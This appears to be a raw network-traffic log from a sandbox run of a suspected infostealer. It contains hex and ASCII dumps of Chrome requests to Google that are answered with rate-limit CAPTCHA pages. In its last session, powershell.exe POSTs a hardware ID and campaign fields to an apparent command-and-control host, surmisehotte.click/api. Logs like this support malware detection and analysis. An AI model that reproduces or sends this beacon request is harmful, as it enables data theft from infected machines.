2024-12-21 20:06:28 UTC	1255	IN	Data Raw: 59 58 6c 52 64 30 52 73 61 45 45 79 63 30 74 69 65 6a 52 32 59 6a 6b 76 59 30 46 71 4d 46 42 47 5a 46 5a 6b 53 44 64 53 4c 79 39 36 63 47 5a 4b 59 57 64 71 65 47 39 33 59 30 52 61 4e 58 46 79 59 30 35 36 65 6d 64 71 51 33 67 32 4e 45 4e 4b 63 6d 31 56 54 33 67 76 4f 56 6c 49 62 57 31 70 5a 6d 68 78 63 6a 56 6a 62 31 68 4d 53 32 70 30 4d 69 39 6d 4d 31 46 4b 64 46 68 36 57 45 52 32 5a 30 35 6d 63 44 42 51 65 6d 34 79 64 46 41 76 61 6e 52 32 56 58 51 30 4f 55 46 59 52 33 52 58 4d 6b 68 6e 64 79 73 72 62 47 59 76 4e 54 56 6b 4e 45 35 79 4f 48 5a 35 4e 44 6c 4e 61 58 4d 76 64 6b 52 6e 4e 31 63 76 54 32 70 31 64 53 38 78 4f 55 64 51 52 45 74 6a 62 45 51 79 51 33 46 49 64 32 51 77 64 69 74 71 4f 45 6c 43 63 6d 38 35 4c 30 51 34 5a 58 52 6a 4b 33 4a 31 52 57 74 Data Ascii: YXlRd0RsaEEyc0tiejR2YjkvY0FqMFBGZFZkSDdSLy96cGZKYWdqeG93Y0RaNXFyY056emdqQ3g2NENKcm1VT3gvOVlIbW1pZmhxcjVjb1hMS2p0Mi9mM1FKdFh6WER2Z05mcDBQem4ydFAvanR2VXQ0OUFYR3RXMkhndysrbGYvNTVkNE5yOHZ5NDlNaXMvdkRnN1cvT2p1dS8xOUdQREtjbEQyQ3FId2QwditqOElCcm85L0Q4ZXRjK3J1RWt
2024-12-21 20:06:28 UTC	1255	IN	Data Raw: 54 6c 63 7a 59 6a 6b 35 61 31 6b 7a 56 6b 5a 48 64 56 5a 6d 63 30 52 70 4d 44 52 4b 64 43 74 4b 62 57 31 54 62 45 6c 45 63 45 52 33 61 6d 56 32 5a 54 4d 7a 4c 32 5a 6c 57 45 5a 44 52 6d 4e 35 65 6e 49 34 62 58 49 78 64 6e 4e 53 63 6a 51 34 54 55 78 4c 61 58 42 46 52 57 35 51 53 57 45 78 53 6a 49 34 56 32 68 75 63 48 70 61 62 69 73 72 4d 6d 30 34 5a 32 64 4b 52 6b 46 58 65 44 68 34 59 30 52 74 51 54 52 4d 5a 6b 56 32 4d 57 78 6f 5a 57 52 59 53 7a 46 73 64 55 46 7a 61 53 74 50 63 6a 68 47 65 58 4e 76 55 58 46 31 61 32 78 6f 4d 54 52 4d 52 57 4e 49 63 32 5a 50 4c 30 5a 58 52 54 46 6f 53 45 34 7a 4e 55 64 36 4e 55 56 77 65 47 56 47 52 46 6c 32 4f 57 4a 4c 5a 7a 42 45 55 54 46 4b 54 31 45 7a 55 30 4a 58 51 6d 77 33 54 6e 64 32 54 30 52 43 54 48 51 33 56 56 63 Data Ascii: TlczYjk5a1kzVkZHdVZmc0RpMDRKdCtKbW1TbElEcER3amV2ZTMzL2ZlWEZDRmN5enI4bXIxdnNScjQ4TUxLaXBFRW5QSWExSjI4V2hucHpabisrMm04Z2dKRkFXeDh4Y0RtQTRMZkV2MWxoZWRYSzFsdUFzaStPcjhGeXNvUXF1a2xoMTRMRWNIc2ZPL0ZXRTFoSE4zNUd6NUVweGVGRFl2OWJLZzBEUTFKT1EzU0JXQmw3Tnd2T0RCTHQ3VVc
2024-12-21 20:06:28 UTC	1255	IN	Data Raw: 46 65 6c 56 4b 5a 46 68 55 63 6b 46 53 51 53 39 68 4d 6a 46 4b 53 46 4a 71 53 57 45 79 52 55 74 49 54 32 5a 74 63 47 39 69 4e 6b 31 53 55 55 64 56 54 30 6c 55 5a 45 52 32 63 6d 31 36 51 31 46 50 61 45 74 45 53 31 6c 42 56 6e 4a 4c 52 30 78 6b 64 47 56 33 4d 45 6f 79 61 6c 42 79 55 6a 4e 49 64 46 70 47 56 46 4a 69 54 6e 5a 49 4d 6d 4a 7a 59 6a 68 7a 57 6a 6c 35 52 6b 31 6d 51 6b 52 71 61 6c 70 58 5a 45 70 6e 5a 45 64 50 57 58 6b 35 63 55 4a 6d 56 46 4e 43 56 6e 52 6e 54 6b 78 73 62 56 6b 77 5a 55 78 76 56 6a 55 34 56 44 46 50 4d 30 56 54 5a 55 6c 4e 59 6c 64 70 53 7a 42 76 57 6a 42 48 53 55 4e 4c 51 32 6b 79 5a 32 4e 61 65 57 31 33 4e 55 68 48 55 58 6f 76 4d 46 42 4b 55 6c 4a 6a 62 32 68 4f 56 56 52 58 4f 48 52 57 54 6c 70 33 63 58 56 68 52 32 68 79 53 48 Data Ascii: FelVKZFhUckFSQS9hMjFKSFJqSWEyRUtIT2ZtcG9iNk1SUUdVT0lUZER2cm16Q1FPaEtES1lBVnJLR0xkdGV3MEoyalByUjNIdFpGVFJiTnZIMmJzYjhzWjl5Rk1mQkRqalpXZEpnZEdPWXk5cUJmVFNCVnRnTkxsbVkwZUxvVjU4VDFPM0VTZUlNYldpSzBvWjBHSUNLQ2kyZ2NaeW13NUhHUXovMFBKUlJjb2hOVVRXOHRWTlp3cXVhR2hySH
2024-12-21 20:06:28 UTC	724	IN	Data Raw: 5a 6b 53 58 6b 78 57 6d 56 75 5a 30 31 34 4e 33 70 44 62 6a 56 4b 5a 6a 51 31 54 45 49 35 55 55 4e 47 64 48 46 5a 55 33 4e 71 4e 32 39 31 61 6a 56 4c 59 6d 5a 45 52 46 42 75 4d 48 59 76 62 6b 31 6a 62 55 46 42 59 58 67 7a 63 57 74 76 59 33 68 53 63 32 68 4d 54 45 46 36 4e 43 39 42 4b 32 56 32 53 30 6c 55 5a 33 70 6b 55 6a 6c 69 4f 54 67 77 55 47 63 77 61 32 78 6b 5a 58 4e 4d 57 6d 78 58 59 6a 67 76 4c 30 31 46 56 44 4a 36 4f 48 59 76 5a 32 5a 32 52 31 70 5a 53 55 4e 44 51 30 68 61 51 55 46 42 51 55 46 43 53 6c 4a 56 4e 55 56 79 61 30 70 6e 5a 32 63 39 50 54 6f 51 52 47 46 73 62 47 46 7a 49 45 31 68 64 6d 56 79 61 57 4e 72 63 30 6f 48 49 7a 41 7a 4e 57 4a 68 4d 31 49 36 5a 33 4e 66 63 33 4e 77 50 57 56 4b 65 6d 6f 30 64 45 52 51 4d 56 52 6d 53 58 6c 72 4d Data Ascii: ZkSXkxWmVuZ014N3pDbjVKZjQ1TEI5UUNGdHFZU3NqN291ajVLYmZERFBuMHYvbk1jbUFBYXgzcWtvY3hSc2hMTEF6NC9BK2V2S0lUZ3pkUjliOTgwUGcwa2xkZXNMWmxXYjgvL01FVDJ6OHYvZ2Z2R1pZSUNDQ0haQUFBQUFCSlJVNUVya0pnZ2c9PToQRGFsbGFzIE1hdmVyaWNrc0oHIzAzNWJhM1I6Z3Nfc3NwPWVKemo0dERQMVRmSXlrM
2024-12-21 20:06:28 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.11.20	49763	172.217.15.196	443	8052	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-21 20:06:28 UTC	710	OUT	GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CI+2yQEIorbJAQipncoBCMD2ygEIk6HLAQic/swBCIWgzQEIrJ7OAQjkr84BCMO2zgEIvbnOAQjtvM4BCLu9zgEI1r3OAQjMv84BGMHLzAEYva7OARidsc4B Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9 Cookie: NID=517=i4E8sm-BN75bnGkPw4VW8uy51aQ8ounjntfNX2fu8MFJNuIvCX0dRBy-XkHqHwKOVFSSaC2nqfULsnHhY3TzIXHWC90jS3Wi2BINtQIDr1LJvZE4Ud-byTNL9Q04Nd1-ydmJvrWYY5vORspW6soJ1bMj20dq8UvPjgkw2sOvmuTUanqu
2024-12-21 20:06:29 UTC	844	IN	HTTP/1.1 302 Found Location: https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgRmgZjNGMS_nLsGIjA0ik1s4JVq9eOJpsVlOM2gI-DLgMPidfxSgxq5jVmu_BWE0kM6B2QcsTf8YS-EqZsyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM x-hallmonitor-challenge: CgsIxb-cuwYQiLCNTxIEZoGYzQ Content-Type: text/html; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Permissions-Policy: unload=() Date: Sat, 21 Dec 2024 20:06:29 GMT Server: gws Content-Length: 458 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-21 20:06:29 UTC	411	IN	Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 6f 72 72 79 2f 69 6e 64 65 78 3f 63 6f 6e 74 69 6e 75 65 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 6f 67 62 25 33 46 68 Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fh
2024-12-21 20:06:29 UTC	47	IN	Data Raw: 6b 56 55 58 30 31 46 55 31 4e 42 52 30 56 61 41 55 4d 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: kVUX01FU1NBR0VaAUM">here</A>.</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.11.20	49764	172.217.15.196	443	8052	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-21 20:06:28 UTC	553	OUT	GET /async/newtab_promos HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9 Cookie: NID=517=i4E8sm-BN75bnGkPw4VW8uy51aQ8ounjntfNX2fu8MFJNuIvCX0dRBy-XkHqHwKOVFSSaC2nqfULsnHhY3TzIXHWC90jS3Wi2BINtQIDr1LJvZE4Ud-byTNL9Q04Nd1-ydmJvrWYY5vORspW6soJ1bMj20dq8UvPjgkw2sOvmuTUanqu
2024-12-21 20:06:29 UTC	762	IN	HTTP/1.1 302 Found Location: https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgRmgZjNGMS_nLsGIjAeKkU8fuiGNfH1GNGe4bKzU792jorXUJawIOeaOJy1_dG9sWahqozDrID_PZwKGOwyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM x-hallmonitor-challenge: CgsIxb-cuwYQ7taUTRIEZoGYzQ Content-Type: text/html; charset=UTF-8 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Permissions-Policy: unload=() Date: Sat, 21 Dec 2024 20:06:29 GMT Server: gws Content-Length: 417 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-21 20:06:29 UTC	417	IN	Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 6f 72 72 79 2f 69 6e 64 65 78 3f 63 6f 6e 74 69 6e 75 65 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 70 72 6f 6d 6f 73 26 Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.11.20	49762	172.217.15.196	443	8052	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-21 20:06:29 UTC	727	OUT	GET /sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgRmgZjNGMS_nLsGIjAeKkU8fuiGNfH1GNGe4bKzU792jorXUJawIOeaOJy1_dG9sWahqozDrID_PZwKGOwyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9 Cookie: NID=517=i4E8sm-BN75bnGkPw4VW8uy51aQ8ounjntfNX2fu8MFJNuIvCX0dRBy-XkHqHwKOVFSSaC2nqfULsnHhY3TzIXHWC90jS3Wi2BINtQIDr1LJvZE4Ud-byTNL9Q04Nd1-ydmJvrWYY5vORspW6soJ1bMj20dq8UvPjgkw2sOvmuTUanqu
2024-12-21 20:06:29 UTC	356	IN	HTTP/1.1 429 Too Many Requests Date: Sat, 21 Dec 2024 20:06:29 GMT Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Content-Type: text/html Server: HTTP server (unknown) Content-Length: 3136 X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-21 20:06:29 UTC	899	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 70 72 6f 6d 6f 73 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta name="viewport" content="initial-scale=1"><title>https://www.google.com/async/newtab_promos</title></head
2024-12-21 20:06:29 UTC	1255	IN	Data Raw: 61 63 6b 20 3d 20 66 75 6e 63 74 69 6f 6e 28 72 65 73 70 6f 6e 73 65 29 20 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 61 70 74 63 68 61 2d 66 6f 72 6d 27 29 2e 73 75 62 6d 69 74 28 29 3b 7d 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 64 69 76 20 69 64 3d 22 72 65 63 61 70 74 63 68 61 22 20 63 6c 61 73 73 3d 22 67 2d 72 65 63 61 70 74 63 68 61 22 20 64 61 74 61 2d 73 69 74 65 6b 65 79 3d 22 36 4c 66 77 75 79 55 54 41 41 41 41 41 4f 41 6d 6f 53 30 66 64 71 69 6a 43 32 50 62 62 64 48 34 6b 6a 71 36 32 59 31 62 22 20 64 61 74 61 2d 63 61 6c 6c 62 61 63 6b 3d 22 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 22 20 64 61 74 61 2d 73 3d 22 36 67 51 42 68 37 52 30 4a 6d 69 45 42 61 55 6d 65 43 47 77 6d 69 6e 43 34 4c 49 34 43 51 55 35 61 Data Ascii: ack = function(response) {document.getElementById('captcha-form').submit();};</script><div id="recaptcha" class="g-recaptcha" data-sitekey="6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b" data-callback="submitCallback" data-s="6gQBh7R0JmiEBaUmeCGwminC4LI4CQU5a
2024-12-21 20:06:29 UTC	982	IN	Data Raw: 73 20 70 61 67 65 20 61 70 70 65 61 72 73 20 77 68 65 6e 20 47 6f 6f 67 6c 65 20 61 75 74 6f 6d 61 74 69 63 61 6c 6c 79 20 64 65 74 65 63 74 73 20 72 65 71 75 65 73 74 73 20 63 6f 6d 69 6e 67 20 66 72 6f 6d 20 79 6f 75 72 20 63 6f 6d 70 75 74 65 72 20 6e 65 74 77 6f 72 6b 20 77 68 69 63 68 20 61 70 70 65 61 72 20 74 6f 20 62 65 20 69 6e 20 76 69 6f 6c 61 74 69 6f 6e 20 6f 66 20 74 68 65 20 3c 61 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 70 6f 6c 69 63 69 65 73 2f 74 65 72 6d 73 2f 22 3e 54 65 72 6d 73 20 6f 66 20 53 65 72 76 69 63 65 3c 2f 61 3e 2e 20 54 68 65 20 62 6c 6f 63 6b 20 77 69 6c 6c 20 65 78 70 69 72 65 20 73 68 6f 72 74 6c 79 20 61 66 74 65 72 20 74 68 6f 73 65 20 72 65 71 75 65 73 74 73 20 73 74 6f 70 2e 20 20 49 Data Ascii: s page appears when Google automatically detects requests coming from your computer network which appear to be in violation of the <a href="//www.google.com/policies/terms/">Terms of Service</a>. The block will expire shortly after those requests stop. I

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.11.20	49765	172.217.15.196	443	8052	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-21 20:06:29 UTC	901	OUT	GET /sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgRmgZjNGMS_nLsGIjA0ik1s4JVq9eOJpsVlOM2gI-DLgMPidfxSgxq5jVmu_BWE0kM6B2QcsTf8YS-EqZsyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CI+2yQEIorbJAQipncoBCMD2ygEIk6HLAQic/swBCIWgzQEIrJ7OAQjkr84BCMO2zgEIvbnOAQjtvM4BCLu9zgEI1r3OAQjMv84BGMHLzAEYva7OARidsc4B Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9 Cookie: NID=517=i4E8sm-BN75bnGkPw4VW8uy51aQ8ounjntfNX2fu8MFJNuIvCX0dRBy-XkHqHwKOVFSSaC2nqfULsnHhY3TzIXHWC90jS3Wi2BINtQIDr1LJvZE4Ud-byTNL9Q04Nd1-ydmJvrWYY5vORspW6soJ1bMj20dq8UvPjgkw2sOvmuTUanqu
2024-12-21 20:06:29 UTC	356	IN	HTTP/1.1 429 Too Many Requests Date: Sat, 21 Dec 2024 20:06:29 GMT Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Content-Type: text/html Server: HTTP server (unknown) Content-Length: 3208 X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-21 20:06:29 UTC	899	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 6f 67 62 3f 68 6c 3d 65 6e 2d 55 53 26 61 6d 70 3b 61 73 79 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta name="viewport" content="initial-scale=1"><title>https://www.google.com/async/newtab_ogb?hl=en-US&asy
2024-12-21 20:06:29 UTC	1255	IN	Data Raw: 0a 3c 73 63 72 69 70 74 3e 76 61 72 20 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 20 3d 20 66 75 6e 63 74 69 6f 6e 28 72 65 73 70 6f 6e 73 65 29 20 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 61 70 74 63 68 61 2d 66 6f 72 6d 27 29 2e 73 75 62 6d 69 74 28 29 3b 7d 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 64 69 76 20 69 64 3d 22 72 65 63 61 70 74 63 68 61 22 20 63 6c 61 73 73 3d 22 67 2d 72 65 63 61 70 74 63 68 61 22 20 64 61 74 61 2d 73 69 74 65 6b 65 79 3d 22 36 4c 66 77 75 79 55 54 41 41 41 41 41 4f 41 6d 6f 53 30 66 64 71 69 6a 43 32 50 62 62 64 48 34 6b 6a 71 36 32 59 31 62 22 20 64 61 74 61 2d 63 61 6c 6c 62 61 63 6b 3d 22 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 22 20 64 61 74 61 2d 73 3d 22 35 62 6b 4f 6e 48 49 54 31 Data Ascii: <script>var submitCallback = function(response) {document.getElementById('captcha-form').submit();};</script><div id="recaptcha" class="g-recaptcha" data-sitekey="6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b" data-callback="submitCallback" data-s="5bkOnHIT1
2024-12-21 20:06:29 UTC	1054	IN	Data Raw: 30 70 78 3b 20 6d 61 72 67 69 6e 3a 30 20 30 20 31 35 70 78 20 30 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 65 6d 3b 22 3e 0a 54 68 69 73 20 70 61 67 65 20 61 70 70 65 61 72 73 20 77 68 65 6e 20 47 6f 6f 67 6c 65 20 61 75 74 6f 6d 61 74 69 63 61 6c 6c 79 20 64 65 74 65 63 74 73 20 72 65 71 75 65 73 74 73 20 63 6f 6d 69 6e 67 20 66 72 6f 6d 20 79 6f 75 72 20 63 6f 6d 70 75 74 65 72 20 6e 65 74 77 6f 72 6b 20 77 68 69 63 68 20 61 70 70 65 61 72 20 74 6f 20 62 65 20 69 6e 20 76 69 6f 6c 61 74 69 6f 6e 20 6f 66 20 74 68 65 20 3c 61 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 70 6f 6c 69 63 69 65 73 2f 74 65 72 6d 73 2f 22 3e 54 65 72 6d 73 20 6f 66 20 53 65 72 76 69 63 65 3c 2f 61 3e 2e 20 54 68 65 20 62 6c 6f 63 6b 20 77 Data Ascii: 0px; margin:0 0 15px 0; line-height:1.4em;">This page appears when Google automatically detects requests coming from your computer network which appear to be in violation of the <a href="//www.google.com/policies/terms/">Terms of Service</a>. The block w

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.11.20	49770	104.21.96.1	443	9160	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-21 20:06:32 UTC	278	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=4V1B6UAQT2ODVO User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 692 Host: surmisehotte.click
2024-12-21 20:06:32 UTC	692	OUT	Data Raw: 2d 2d 34 56 31 42 36 55 41 51 54 32 4f 44 56 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 31 36 37 38 31 36 33 42 31 32 39 46 44 34 43 44 42 37 31 45 33 32 46 31 32 38 38 35 43 42 33 0d 0a 2d 2d 34 56 31 42 36 55 41 51 54 32 4f 44 56 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 34 56 31 42 36 55 41 51 54 32 4f 44 56 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 4a 45 63 61 47 2d 2d 73 69 6e 67 6c 36 0d 0a 2d 2d 34 56 31 42 36 55 41 Data Ascii: --4V1B6UAQT2ODVOContent-Disposition: form-data; name="hwid"71678163B129FD4CDB71E32F12885CB3--4V1B6UAQT2ODVOContent-Disposition: form-data; name="pid"1--4V1B6UAQT2ODVOContent-Disposition: form-data; name="lid"yJEcaG--singl6--4V1B6UA
